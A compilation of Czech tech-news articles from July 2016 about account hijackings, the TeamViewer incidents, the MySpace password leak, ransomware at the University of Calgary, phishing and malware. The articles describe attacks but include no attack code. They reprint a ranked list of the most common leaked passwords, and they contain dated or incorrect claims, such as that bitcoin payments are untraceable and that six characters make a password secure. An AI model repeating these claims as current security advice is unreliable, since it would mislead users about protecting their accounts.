Skupina útočníků vystupující pod jménem Ourminem si z Zuckerberga trochu dělala legraci. Na jeho Twitter například napsali výzvu, aby je kontaktoval („Hey we got access to your Twitter & Instagram & Pinterest, we are just testing your security, please direct message us“). Navíc tvrdí, že se jim podařilo získat přístup i na Instagram. To je ještě o něco pikantnější, protože Instagram patří přímo Facebooku.

Je dobré připomenout, že jak Twitter, tak Instagram umožňují velmi snadno použitelné dvoufaktorové ověření.


TeamViewer reaguje na údajný hack. Viní špatná hesla

27.7.2016  Zdroj:Lupa.cz Hacking
Populární software pro vzdálený přístup měl být prý hacknut a postižení uživatelé hlásí řadu škod. Jedno je ale jasné. Nic nevíme.
TeamViewer je populární pomůcka pro vzdálený přístup. Pokud si ji pořídíte do počítače, můžete získat software, který jde poměrně obtížně deaktivovat či nastavit tak, abyste si ho mohli spustit jenom, když chcete, aby běžel. Poměrně zásadní může být i to, že řadě uživatelů skutečně nemusí dojít, že si do počítače dávají něco, co někomu cizímu může umožnit vzdálený přístup až příliš snadno. Zejména pokud si TeamViewer nedostatečně zabezpečí.

Minulý týden se v řadě zahraničních medií objevily úvahy nad tím, že možná došlo k hacknutí serverů TeamVieweru, případně že existuje nějaká zásadní bezpečnostní chyba. Řada uživatelů TeamVieweru hlásila, že jejich počítače byly kompromitovány, bez rozdílu platformy. Mělo jít ale i o uživatele, kteří měli silné heslo, včetně některých, kteří používali dvoufaktorové ověřování.

Řada uživatelů přišla o peníze na PayPal účtech, někdo si prohlédl a možná i stáhl jejich poštu, objevují se i informace o objednávkách na Amazonu či eBay. Nákupy proběhly zpravidla v podobě dárkových karet, běžně i za několik tisíc dolarů.

Úvahy o tom, že by za vším mohl být hack přímo na serverech TeamVieweru, podpořil i více než tříhodinový výpadek, velmi pravděpodobně způsobený DDoS útokem. Několik zdrojů ale navíc uvádí, že DNS servery pro TeamViewer měly být přesměrovány na čínské adresy.

Team Viewer samotný tvrdí, že žádné napadení systémů se nekoná a že za případné problémy si mohou uživatelé samotní. Prostě tím, že nepoužili dostatečně silné heslo a navíc prý na více počítačích používají stejné heslo, které je v řadě případů totožné s tím, které mají (například) na LinkedIn či dalších službách, odkud už v minulosti unikly stovky milionů přihlašovacích údajů. Dalším možným ohrožením může být trojský kůň, který se tváří jako aktualizace pro Adobe Flash a zaměřuje se právě na využití TeamVieweru.

V pozdějším prohlášení pak TeamViewer ohlásil zavedení nových bezpečnostních opatření – například nutnost potvrzení, pokud se uživatel přihlásí z nového zařízení.

TeamViewer se nijak nevyjádřil k případům, kdy uživatelé uvádějí, že měli silné unikátní heslo, či dokonce dvoufaktorové ověření. K problémů s DNS servery poskytl pouze vyjádření v tom smyslu, že byly odstaveny DDoS útokem, ale v žádném případě nedošlo k narušení bezpečnosti.

Máte na počítači TeamViewer?
Pokud máte na počítači TeamViewer, případně pokud jste ho někomu na počítač pořídili a pomáhali mu, tak je nejvyšší čas velmi bedlivě ověřit, jestli používá dostatečně silné heslo, případně stávající heslo nahradit preventivně jiným.

Nejpodstatnějším opatřením by ale mělo být hlavně to, že nebudete mít TeamViewer spuštěný bezdůvodně. Je nutné zakázat automatické spouštění a po použití ho nezapomínat vypnout. U starších verzí TeamVieweru je něco takového poněkud komplikovanější a nejsnazší je u nich odinstalace a nová instalace později, když bude program znovu potřeba.

Ponechávat TeamViewer použitelný pouze zadáním jednoho hesla navíc není zcela nejlepší nápad. Trochu něčemu takovému ale nahrává to, že okamžitě po instalaci je uživatel v zásadě přesvědčen, aby něco takového povolil. Prověřte si tedy velmi pečlivě, jak máte TeamViewer nastavený.

Uchováváte si hesla v prohlížeči?
Z výše uvedených případů vykradených účtů v PayPalu či nákupů přes e-shopy ale plyne i další poměrně podstatné bezpečnostní opatření. Pokud používáte PayPal a máte tam napojenou platební kartu či tam máte nějaké prostředky, rozhodně byste neměli mít heslo uložené přímo v prohlížeči.

Totéž platí i o jakékoliv službě, která umožňuje okamžitě platit z vaší platební karty, bez nutnosti zadávat (ověřovat), že platba má skutečně proběhnout. Jakýkoliv útočník, který se dostal k vašemu počítači ve formě vzdáleného přístupu či přímého přístupu, takovéto věci může příliš snadno zneužít.


Kvůli schválení zákona o hazardu padají weby. Útoky cílí na politiku a policii

27.7.2016  Zdroj:Lupa.cz Hacking
Během včerejška se pod palbou ocitly stránky Senátu nebo policie. Dnes to vypadá na web ministerstva vnitra.
Má to být pravděpodobně odveta za schválený zákon o regulaci hazardu, který obsahuje i pasáže o možné cenzuře internetu ministerskými úředníky. Už včera rozeslali útočníci, kteří se označují za Anonymous, zprávu, že v rámci boje za svobodu internetu připravují další útoky.

Kromě stránek horní komory nejely ani stránky ČSSD nebo policie. Dnes se útok stočil pravděpodobně na stránky ministerstva vnitra, které byly od rána nedostupné.

Kontext: A je hotovo. Senát schválil regulaci hazardu včetně blokování webů

Zatímco iniciativa Přichází cenzor a Piráti se chtějí pustit běžnou cestou přes Ústavní soud, scéna odpovídá na schválení kontroverzního zákona po svém.

Stránky ministerstva vnitra jsou oblíbeným cílem a s hackerskými útoky mají zkušenosti už více než šestnáct let. Na přelomu tisíciletí se na nich vyřádila třeba slovenská skupina binary.division.


Měli jste účet na MySpace? 427 milionů hesel je na prodej za 2 800 dolarů

27.7.2016  Zdroj:Lupa.cz Sociální sítě
Rok 2016 začíná vypadat náramně, co se úniků (a vymyšlených úniků) hesel týče. Pokud je tento případ skutečný, tak je to také rekordní únik.
Stejný hacker, který prodával 164 (číslo se různí) milionů hesel z LinkedIn (viz Na prodej je 117 milionů hesel z LinkedIn, za 2 200 dolarů), v minulém týdnu nabídl na prodej 427 milionů hesel (ale jenom 360 milionů e-mailů) z MySpace. Což je jedna z prvních sociálních sítí, která by skutečně nějakých těch pár stovek milionů účtů mohla v určité době mít. Byť dnes už je to jenom pohrobek dřívější slávy.

Zajímavé na tomto dalším úniku je, že podle Hacker Tries To Sell 427 Milllion Stolen MySpace Passwords For $2,800 by mohlo jít skutečně o únik e-mailů a hesel používaných v MySpace, tedy pochopitelně opět, pokud budeme mírně ignorovat to, že e-maily a hesla lidé recyklují a Motherboardu se nepodařilo ověřit víc než několik e-mailů.
V úniku je větší množství hesel, protože k jednomu e-mailu jsou v některých případech poskytnuta hesla dvě. Vedle e-mailu, hesla/hesel obsahuje ještě uživatelské jméno. To je ale k dispozici pouze u 111 milionů záznamů. Někde primární hesla chybí a je k dispozici pouze heslo sekundární.

Kompletní únik mají k dispozici v LeakedSource.com a analýzu si můžete přečíst na jejich blogu. Uvádějí tam i to, že hesla byla uložena v šifrované SHA1 podobě, ale bez (zásadně nutného) dodání salt složky, proto je velmi lehké hesla získat (říkat SHA1 šifrování je dnes opravdu už poněkud nepatřičné). Zajímavé může být i to, že je zde 855 tisíc hesel „homelesspa“, která jsou zcela určitě výsledkem automatického generování.

TIP: Podívejte se například na SHA1 Free Online Encrypt & Decrypt, pokud si chcete zkusit, jak vypadá SHA1. A všimněte si, že v databázi už mají skoro 3 miliardy slov.

Nejpoužívanější hesla? Klasika
Když z následujícího přehledu vynecháte výše zmíněné „homelesspa“, tak nejpoužívanější hesla vlastně nejsou nijak překvapivá:

Heslo Výskyt
1 homelesspa 855,478
2 password1 585,503
3 abc123 569,825
4 123456 487,945
5 myspace1 276,915
6 123456a 244,641
7 123456789 191,016
8 a123456 165,132
9 123abc 159,700
10 (POSSIBLY INVALID) 158,462
11 qwerty1 141,110
12 passer2009 130,740
13 fuckyou1 125,302
14 iloveyou1 123,668
15 princess1 114,107
16 12345a 111,818
17 monkey1 106,424
18 football1 101,149
19 babygirl1 90,685
20 love123 88,756
21 a12345 85,874
22 iloveyou 85,001
23 jordan23 81,028
24 hello1 80,218
25 jesus1 78,075
26 bitch1 78,015
27 password 77,913
28 iloveyou2 76,970
29 michael1 75,878
30 soccer1 74,926
31 blink182 73,145
32 29rsavoy 71,551
33 123qwe 70,476
34 angel1 70,271
35 myspace 69,019
36 fuckyou2 68,995
37 jessica1 67,644
38 number1 65,976
39 baseball1 65,400
40 asshole1 63,078
41 1234567890 62,855
42 ashley1 62,611
43 anthony1 62,295
44 money1 61,639
45 asdasd5 60,810
46 123456789a 60,441
47 superman1 59,565
48 sunshine1 57,522
49 nicole1 56,039
50 password2 55,754
51 charlie1 54,432
52 shadow1 54,398
53 jordan1 54,004
54 1234567 51,131
55 50cent 50,719
LeakedSource se prozatím nepodařilo rozlousknout všechna hesla, ale pro sestavení žebříčku nejpoužívanějších to stačí, SHA1 podoba má snadno spočitatelný počet výskytů. A protože jde o velmi snadná hesla, z nichž většina už dávno má SHA1 podobu známou, tak je snadné takovýto žebříček sestavit.

Nejvíce účtů z domény Yahoo
Pohled na nejpoužívanější domény u e-mailu uvedených při založení účtů ukazuje na 126 milionů výskytů @yahoo.com. Poměrně pěkná ukázka toho, jak významné před nějakými těmi pěti a více lety bylo Yahoo v USA. Pokud byste se chtěli podívat na delší přehled, tak viz výše zmíněný blog od LeakedSource.

Doména Výskyt
1 @yahoo.com 126,053,325
2 @hotmail.com 79,747,231
3 @gmail.com 25,190,557
4 @aol.com 24,115,704
5 @aim.com 5,345,585
6 @live.com 4,728,497
7 @hotmail.co.uk 4,701,850
8 @msn.com 4,378,167
9 @myspace.com 4,257,451
10 @comcast.net 3,275,651
MySpace má dnes jen asi 50 milionů návštěvníků
Dnešní MySpace má už jenom nějakých 50 milionů návštěvníků měsíčně, ale je více než pravděpodobné, že v průběhu deseti let nasbírali stovky milionů účtů, které jsou vázané ke stále existujícím e-mailům. Samotné MySpace uvádí, že má miliardu registrovaných uživatelů.

Kdy došlo k úniku výše zmíněných e-mailů a hesel, známo není. Mohlo to být nedávno a hackeři se nemuseli dostat ke všem údajům, ale také před několika lety. Divíte se, proč se případný letitý únik snaží někdo prodat až teď? Většinou to bývá proto, že už pro data nemá žádné další využití. Už bylo vytěženo vše, co mohlo být, a s ohledem na stáří dat už nejsou kombinace e-mail+heslo dostatečně aktuální.

Jak navíc uvádí Motherboard, hacker (známý jako Peace) jim řekl, že data dal raději k prodeji, než je „idioti začnou šířit“. Nabízí je za 6 bitcoinů, tedy zhruba za 2 800 dolarů.

Co dělat, pokud jste byli uživateli MySpace?
Jako u každého úniku i zde platí, že heslo použité na daném webu musíte považovat za prozrazené, ať už v kombinaci s vaším e-mailem tam použitým, nebo dalšími e-maily, které používáte. Toto heslo byste už nikdy neměli nikde použít, pokud ho stále na MySpace máte, tak by bylo vhodné ho změnit – bez ohledu na to, zda MySpace používáte, či nikoliv.


LAW FIT 2016: Internet už nebude stejný. Jen nevíme, jaký bude

27.7.2016 Zdroj:Lupa.cz IT
Mohou přísnější evropská pravidla pro ochranu osobních údajů poškodit zdejší internetové podnikatele? Letošní ročník konference se točil kolem ochrany dat.
„Internet se změní zásadním způsobem, už nebude takový, jak ho dnes známe,“ řekl ve svém vystoupení na čtvrtém ročníku konference LAW FIT 2016 Josef Prokeš, ředitel správní sekce Úřadu pro ochranu osobních údajů (ÚOOÚ). Podstatná část setkání právníků, studentů, zástupců státní správy a internetových podnikatelů se tentokrát nesla ve stínu v dubnu schváleného nařízení Evropské unie o ochraně osobních údajů (GDPR).

TIP: Ochrání nám EU osobní údaje na internetu?

Pro celou debatu ovšem bylo příznačné, že dnes vlastně ještě nikdo není schopný odhadnout, jak konkrétně nařízení podobu internetu změní. „Neznalost nařízení je velká. Nařízení zatím studují jak úředníci, tak zástupci průmyslu,“ připustil Prokeš. První přesnější výklad jednotlivých obecných pravidel se tak podle něj od úřadů na ochranu údajů dá čekat až v průběhu podzimu. Z hlediska nařízení je času dost – v platnost totiž vstoupí až na jaře roku 2018. „Nejen trh, ale i úřad se v průběhu dvou let musí adaptovat na nový evropský předpis,“ dodala ve svém vystoupení také šéfka ÚOOÚ Ivana Janů.

Bývalá ústavní soudkyně zdůraznila, že ani v měnícím se prostředí internetu nesmíme zapomínat na „právo na informační sebeurčení“. „Právě uvedená pravidla, pokud budou férově a rozumně prosazována, mohou být srozumitelným pojítkem k uchopení srozumitelného pojmu soukromí, neodmyslitelně spjatého s právem na lidskou důstojnost, které tradičně je a musí i nadále zůstat neobchodovatelnou komoditou. Soukromí člověka v tomto století jistě prochází proměnami, rezignovat však na jeho důležitost v nárocích na jeho ochranu není možno, to je imperativ.“

Neuvážené využívání technologií podle Janů může ohrožovat vývoj společnosti a nadbytečné zásahy do soukromí mohou vést k podřízenosti společnosti technice. „Technologická totalita pro mne znamená nejen prosazování neujasněných a neodpovědných konceptů zpracování dat, ale také úplné a nedomyšlené odevzdání se technologiím a technologickým gigantům bez patřičného prostoru pro informační sebeurčení člověka nás všech,“ řekla. „Informační sebeurčení je úzce svázáno s důstojností člověka coby středobodem, ze kterého vycházejí všechna další základní práva obsažená v Listině a ve všech mezinárodních lidskoprávních dokumentech,“ dodala předsedkyně ÚOOÚ.

TIP: Máte právo být zapomenuti. Co změní reforma ochrany osobních dat?

Příliš moc ochrany škodí
Protipól ochranářského přístupu k osobním údajům nabídl na LAW FIT 2016 zástupce generálního ředitele Seznam.cz Michal Feix. Podle něj je evropská představa o nutnosti chránit občany před riziky ve srovnání se světem notně přehnaná. „Problémem Evropy myslím je, že jsme filozoficky přesvědčeni, že evropský občan je z principu středně erudovaný a kompetentní činit samostatná rozhodnutí. A proto je tu stát, který ho pohlídá, aby neudělal nějakou chybu nebo aby se mu něco zlého nestalo. Když to porovnáte s filozofií, kterou razí třeba ve Spojených státech, tak tam je mnohem větší míra odpovědnosti na individuálním občanovi.“

Přísnější evropská pravidla pro ochranu osobních údajů podle Feixe mohou poškodit zdejší internetové podnikatele. „Evropa se dnes chlubí, že má nejlepší ochranu osobních údajů na světě. A to je problém, protože to je naše zásadní konkurenční nevýhoda oproti všem ostatním na světě, kteří ta pravidla nemají stejná,“ argumentoval.

Seznam je – jako řada dalších digitálních firem – závislý na příjmech z reklamy. A ukazuje se, že reklamní model je stále pro uživatele nejpřijatelnější – jejich ochota za služby či obsah přímo platit se v praxi ukazuje jako mizivá. Proto se internetový byznys snaží peníze získávat od inzerentů. Ti ale za peníze vyžadují služby, které jim dávají smysl. Svět digitální reklamy se přitom v uplynulých letech výrazně proměnil. Od cílení odhadovaného podle obsahového zaměření serverů (například na základě předpokladu, že na server o autech chodí hlavně muži) přešel k metodám založeným na datech o chování uživatelů.

Pseudoanonymní či anonymní?
„Dříve jsme se bavili o tom, zda cílíme na muže nebo na ženy, kde asi bydlí a kolik je jim asi let, dnes se bavíme o věcech, které se nazývají třeba nákupní úmysl. Můžete také cílit na různé cílové skupiny, jako třeba ‚chystá se na dovolenou‘ a podobně,“ vysvětloval ve své přednášce Lukáš Rýdl z agentury Dobrý web. „Každý klient, který dnes investuje peníze do své digitální propagace, očekává, že se na konci dozví, co přesně mu taková investice přinesla,“ dodal. A k tomu jsou podle něj zapotřebí velká množství dat a analytické práce.

„Prakticky všechny metody cílení reklamy jsou dnes postavené na jednom podobném principu: snažíte se z chování počítače uhádnout, o jakou osobu se přibližně jedná,“ vysvětloval také Feix. Evropa se podle něj v poslední době snaží odpovědět na otázku, zda tyto tzv. pseudoanonymní údaje jsou nebo nejsou osobními daty. „My se snažíme tvrdit, že data, která v tomto směru osobu jednoznačně neidentifikují, osobními daty nejsou. Problém, na který narážíme, je, že pokud vyvinete nějaké extrémní matematické a výzkumné úsilí, tak pochopitelně existují situace, ve kterých i z těch pseudoanonymních dat jste schopní určit, o jakou osobu se jedná,“ připustil Feix.

Ano, jde zejména o známou kontroverzi kolem cookies. „Je to technologie, která je stará prakticky jako webová stránka sama. Dvacet let nikomu nevadila a na internetu dvacet let bez problémů fungovala. Posledních asi pět let je ale kolem ní ohromný rozruch. Pokud se ale detailně technicky podíváte na to, co je cookie a jaká informace se v cookie ukládá, nemůžete nikdy dospět k jinému závěru, než že se nejedná o informaci, která identifikuje člověka, ale která identifikuje webový prohlížeč,“ přesvědčoval Feix.

Připustil ale také, že někdy i rozpoznání webového prohlížeče může v důsledku vést k identifikaci konkrétního člověka. „Ale zároveň konstatuji, že v drtivé většině všech online firem po světě dnes prakticky není u reklamních systémů důležité, kdo konkrétně u toho počítače sedí. Potřebujete vědět zhruba věkové rozpětí, pohlaví, zajímají vás ideálně zájmy, koníčky, tedy poměrně obecné věci,“ dodal Feix.

Žádné zásadní změny
Pro digitální trh bude každopádně v praxi důležité hlavně to, jak bude ÚOOÚ (případně jiný regulátor) nové nařízení o ochraně osobních údajů vykládat. V tomto směru zatím moc jasno není.

Podle Josefa Prokeše se ovšem mění celkový rámec ochrany osobních dat. „Každý hráč, který se dosud o žádnou ochranu dat nestaral, se s tím teď musí nějak vypořádat,“ řekl. Pokud se ale tuzemské firmy už ochranou dat zabývaly, neměly by pro ně změny být až tak velké. „Z hlediska hmotně-právního se o žádné zásadní změny nejedná. Pokud si vezmete starší stanoviska úřadu, zjistíte, že se tyto věci objevují ve velmi podobném tvaru,“ dodal Prokeš.

Na konkrétní výklad nařízení si ale budeme muset ještě počkat. Institut pro digitální ekonomiku, který byl partnerem konference, zatím shrnul hlavní prvky ve svém materiálu (PDF).


Vyděračský virus zablokoval stovku počítačů. Univerzita zaplatila výkupné půl miliónu

27.7.2016  Viry
Velkou čáru přes rozpočet udělali počítačoví piráti kanadské univerzitě v Calgary. Kyberzločincům se totiž podařilo nakazit více než stovku tamních PC vyděračským virem a za jejich zpřístupnění požadovali bezmála půlmiliónové výkupné. To vedení univerzity nakonec skutečně zaplatilo, upozornil server Vyděračský virus z rodiny ransomware infikoval podstatnou část univerzitního počítačového systému. Kromě desítek počítačů také některé servery, na kterých univerzita provozovala vlastní e-mailový systém.
V univerzitní síti si nezvaný návštěvník počínal úplně stejně, jako když útočí na počítače běžných uživatelů. Ne pevných discích tedy zašifroval data, přičemž za jejich opětovné zpřístupnění požadovali počítačoví piráti výkupné.

Zaplatit chtěli v bitcoinech
Nebyli přitom žádní troškaři. Za dešifrovací klíč chtěli zaplatit 40 bitcoinů, tedy v přepočtu více než 480 000 korun. Tuto virtuální měnu nezvolili kyberzločinci náhodou. Její pohyb se nedá vystopovat, a tak je prakticky nulová šance, že by mohli být vypátráni.

S ohledem na to, že byla zcela paralyzovaná e-mailová komunikace a že se univerzitní administrátoři nemohli dostat do jednotlivých PC, kde byla uložená důležitá data, rozhodlo se vedení univerzity požadavku hackerů vyhovět. Výkupné zaplatili.

Ve snaze o zachování všech důležitých systémů univerzita výkupné zaplatila.
Linda Dalgettyová z univerzity v Calgary
To přitom bezpečnostní experti několik posledních měsíců důrazně nedoporučují. Ani po zaplacení výkupného se totiž uživatelé ke svým datům nemusí dostat. Místo placení výkupného je nutné virus z počítače odinstalovat, k nezálohovaným datům se ale lidé zpravidla již nedostanou.

„Ve snaze o zachování všech důležitých systémů a vyřešení problémů univerzita výkupné týkající se útoku ransomwaru zaplatila,“ potvrdila Linda Dalgettyová, která na univerzitě v Calgary vede finanční oddělení. Žádné další podrobnosti však neprozradila.

Podle serveru The Hacker News nicméně již administrátoři dešifrovací klíč získali. V současnosti se s jeho pomocí již snaží obnovit zašifrovaná data a virus odstranit. Zda se jim to skutečně povede, však zatím není jasné.

V prohlášení zástupci univerzity pouze doplnili, že žádná osobní data studentů nebyla zneužita. Vedení školy prý spolupracuje s tamní policií a bude se snažit útočníky dopátrat.

Vyděračské viry se šíří jako lavina
Jak je z řádků výše patrné, kyberzločincům se nasazování vyděračských virů jednoznačně vyplácí. To je patrně jeden z hlavních důvodů, proč se po síti šíří doslova jako lavina. Na přelomu března a dubna dokonce bezpečnostní experti bili na poplach s tím, že škodlivých kódů požadujících výkupné dramaticky přibylo. 

Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu. 

Jak se bránit proti vyděračským virům?
Neotvírejte přílohy e-mailových zpráv od neznámých a podezřelých adresátů.
Pravidelně zálohujte svoje data. V případě nákazy se počítač jednoduše přeinstaluje a zašifrovaná data se mohou obnovit i bez placení výkupného nebo nutnosti je odšifrovat.
Externí disky nebo jiné úložné systémy, na které jsou data zálohována, by neměly být neustále připojeny k počítači. Minimalizuje se tím riziko, že se vyděračský virus zabydlí i u zálohovaných dat.
Pravidelně aktualizujte operační systém i jiné programy. Znesnadníte tak práci počítačových pirátů, kteří se snaží objevené trhliny zneužít k propašování škodlivých kódů.
Nutné je také pravidelně aktualizovat antivirový program, případně jiné bezpečnostní aplikace.
Nepoužívejte programy, pro které již výrobce ukončil podporu. Hrozba nákazy například na Windows XP je mnohonásobně vyšší než u novějších verzí tohoto operačního systému.


Podvodníci oprášili starý trik, na Facebooku lákají na bonus 1000 Kč

27.7.2016  Podvod
Za zaměstnance České spořitelny se opět vydávají podvodníci na sociální síti Facebook. Lákají na novou verzi internetového bankovnictví Servis24, za vyzkoušení přitom nabízejí 1000 Kč. Ve skutečnosti se pouze snaží od důvěřivců vylákat přihlašovací údaje.
Prakticky nachlup stejný trik zkoušeli počítačoví piráti už letos v dubnu. Tehdy si kvůli tomu na Facebooku dokonce zřídili celý falešný profil. 

Nově to zkouší pomocí reklamy, která se na zmiňované sociální síti objevuje. „Přejděte na novou verzi internetového bankovnictví a získejte bonus 1000 Kč! Bezpečnější bankovnictví s přehlednějším rozvržením pro jednoduchou správu vašich financí,“ stojí v lákavě vyhlížející nabídce.

Obejít dokážou i potvrzovací SMS zprávy
Reklamu doplňuje odkaz, který samozřejmě směřuje na podvodné stránky, jejichž prostřednictvím se snaží kyberzločinci vylákat od důvěřivců přihlašovací údaje k internetovému bankovnictví. Vyplněním přihlašovacích údajů na podvodných stránkách se přitom lidé vystavují velkému riziku.

Počítačoví piráti jsou totiž už jen kousek od toho, aby jim mohli vybílit účet – stačí, aby propašovali virus na jejich chytrý telefon. Prostřednictvím něj pak budou schopni odchytávat potvrzovací SMS zprávy pro platby, jako tomu bylo už v minulosti. 

Ukázka jedné z podvodných SMS zpráv, jejímž prostřednictvím se dokážou podvodníci dostat do chytrého telefonu.

Podvodné webové stránky servis25.ic.cz, kam reklama na Facebooku směřovala, jsou v současnosti již nefunkční. Kyberzločinci ale mohou jednoduše odkaz v reklamě změnit a zkoušet nachytat další lidi.

Zástupci České spořitelny před podobnými podvody varovali již dříve. „Důrazně varujeme před jakoukoli reakcí na podobné výzvy. V žádném případě neklikejte na nabízený odkaz a svoje údaje nevyplňujte nikam jinam než na oficiální stránky www.servis24.cz. Podvodníci by se pak jejich prostřednictvím mohli dostat k Vašim penězům,“ uvedli zástupci banky.

„V případě jakýchkoliv pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207,“ doplnili zástupci banky.

Obezřetní by v případě podobných nabídek měli být také uživatelé jiných bankovních institucí. Není totiž vyloučeno, že stejný trik budou počítačoví piráti zkoušet příště pod hlavičkou úplně jiné společnosti.


Šéf Facebooku hackerům usnadnil práci, na sociálních sítích používal primitivní heslo

27.7.2016  Hacking
Prakticky všechna světová média v pondělí obletěla zpráva o tom, že účty na sociálních sítích šéfa Facebooku Marka Zuckerberga napadli hackeři. Ten ale počítačovým pirátům práci značně usnadnil, protože používal všude jedno stejné heslo. Jak upozornila britská stanice Sky News, bylo navíc velmi primitivní.
Bezpečnostní experti neustále kladou lidem na srdce, jak důležité je používat sofistikovaná hesla k ochraně svých on-line účtů. Jsou totiž zpravidla první linií účinné ochrany před odcizením citlivých osobních dat, například pro on-line bankovnictví nebo platby na internetu.

Je proto až s podivem, že tvůrce jedné z největších sociálních sítí na světě si tuto radu nevzal k srdci. Twitter, LinkedIn, Instagram a také Pinrest si totiž Zuckerberg chránil pomocí primitivního hesla „dadada“.

Jednoduše heslo vyzkoušeli
Na obranu šéfa Facebooku se sluší připomenout, že šlo o účty, které příliš nepoužíval. I přesto ale hackeři ze skupiny OurMine tento úlovek považovali za velmi cennou trofej, se kterou se prakticky okamžitě pochlubili na mikroblogovací síti Twitter. 

Účet hackerů ze skupiny OurMine na sociální síti Twitter.
Hackeři ze skupiny OurMine se pochlubili s cenným úlovkem na Twiteru. Jejich účet byl krátce poté zablokován.

Hackeři Zuckerbergovo heslo získali podle Sky News z ukradené databáze obsahující na 167 miliónů hesel k sociální síti LinkedIn. Ta se nabízela už od minulého měsíce k prodeji na černém internetovém trhu. 

V ní si jednoduše našli přihlašovací údaje šéfa Facebooku a vyzkoušeli je i na dalších účtech na internetu. To jinými slovy znamená, že dostat se na jeho účty na sociálních sítích by zvládli i v případě, kdyby používal sofistikovanější heslo.

Potvrdily se tak slova bezpečnostních expertů o tom, že uniklá databáze může představovat riziko i přesto, že k samotnému útoku na LinkedIn došlo již v roce 2012. Počítačovým pirátům se podařilo přihlašovací údaje zneužít i čtyři roky poté.

Pozor na jednoduchá hesla
Tento případ jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla pro každý účet zvlášť, ale alespoň jednou za pár měsíců je pravidelně měnit.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.


Počítačoví piráti mohli na Facebooku měnit i mazat zprávy

27.7.2016  Podvod
Velké nepříjemnosti mohli způsobit počítačoví piráti uživatelům Facebooku. Na této sociální síti totiž byla chyba, kterou mohli kyberzločinci zneužít k mazání nebo ke změnám zpráv, jež si uživatelé posílají mezi sebou. Upozornili na to bezpečnostní experti ze společnosti Check Point.
Chyba se týkala on-line chatu i oficiální mobilní aplikace Messenger, kterou Facebook svým uživatelům nabízí. „Zranitelnost umožňovala upravit nebo odstranit jakoukoli odeslanou zprávu, fotografii, soubor, odkaz a mnoho dalšího,“ prohlásil David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj kyberzločinci mohli zranitelnost zneužít k manipulaci s historií zpráv v rámci podvodných kampaní. „Útočník mohl změnit historii konverzace, a získat tak zfalšovanou dohodu s obětí nebo jednoduše změnit podmínky dohody,“ konstatoval Řeháček.

Kyberzločinci mohli šířit viry
Chyba mohla být samozřejmě zneužita také k distribuci škodlivých kódů. „Útočník mohl změnit legitimní odkaz nebo soubor na škodlivý a snadno přesvědčit uživatele ke kliknutí a otevření,“ podotkl Řeháček.

Měnit zprávy v chatu přitom standardně nemohou ani samotní uživatelé. Bezpečnostní experti proto zástupce sociální sítě o nově objevené chybě okamžitě informovali, díky čemuž mohla být prakticky okamžitě opravena.

Zda se kyberzločincům podařilo chybu zneužít ještě předtím, není zatím jasné.


Nový virus dokáže řídit internetový provoz. Zobrazuje reklamu a podvodné weby

27.7.2016  Viry
Bezpečnostní experti antivirové společnosti Eset varovali před novým virem zvaným DNS Unlocker, který na napadeném počítači dokáže v podstatě řídit internetový provoz a uživatele nasměrovat na podvodné webové stránky. Zároveň je obtěžuje nadměrným zobrazováním reklamy.
DNS servery jsou ve světě jedniček a nul velmi důležité, protože standardně překládají webové adresy na číselné adresy fyzických počítačů (IP adresy). Právě tyto záznamy dokáže ale nový nezvaný návštěvník měnit.

V praxi to znamená, že hackeři mohou s jeho pomocí přesměrovat uživatele na podvodné internetové stránky. Ve chvíli, kdy uživatel na infikovaném PC zadá do internetového prohlížeče například adresu www.yahoo.com, mohou jej kyberzločinci přesměrovat na jiné stránky.

Ty zpravidla vypadají skutečně jako web Yahoo, ale obsahují daleko více reklamy, za kterou inkasují peníze právě hackeři. A to aniž by uživatel cokoliv postřehl.

Nová hrozba je zákeřnější
DNS Unlocker je však ještě zákeřnější, protože zobrazuje i vyskakující okna na podvodné webové stránky. „DNS útoky nejsou tak destruktivní a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ konstatoval Petr Šnajdr, bezpečnostní expert společnosti Eset.

Podle něj je hlavní problém v tom, jak operační systém Windows pracuje s DNS adresami. „V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS,“ doplnil Šnajdr.

Pozor na administrátorská práva
Bezpečnostní experti se proto s nalezenou nákazou obrátili přímo na společnost Microsoft, respektive na bezpečnostní divizi Microsoft Security Response Center (MSRC), která má na starosti nově objevené zranitelnosti. Ta sice uznala, že jde o chybu, ale neklasifikovala ji jako vážnou, protože k útoku jsou zapotřebí administrátorská práva.

To jinými slovy znamená, že riziku se vystavují pouze ti uživatelé, kteří surfují na internetu s administrátorskými právy. V současnosti jde ale bohužel o běžnou praxi.

Z bezpečnostního hlediska je daleko vhodnější používat počítač k rutinním úkonům pouze z účtu běžného uživatele, nikoliv administrátora. Samozřejmostí by mělo být také používání aktualizovaného antivirového programu, který si bude schopný s podobnými hrozbami poradit.


Děsivé je tiché luxování dat, varuje kybernetický expert

27.7.2016  Zabezpečení
Světové mocnosti více než kdy předtím pomocí počítačových sítí šmírují data o vládních institucích, energetice, továrnách i komunikačních systémech. Občas chaos řízený na dálku někde lokálně vyzkoušejí. Je to zlatá éra pro hackery. Firmy s vládami se o ně přetahují. Chybějí však tisíce specialistů, kterým by se dalo věřit.
Vyplývá to z rozhovoru Práva s předním expertem na počítačovou kriminalitu, 58letým Alešem Špidlou. Je otcem národní kybernetické bezpečnostní strategie, pracoval na ministerstvu vnitra a dnes působí v řízení rizik u českého zastoupení globální poradenské společnosti PricewaterhouseCoopers (PwC)

Podle něj je až děsivé, s jakou intenzitou se dnes tiše sbírají data o citlivé infrastruktuře.

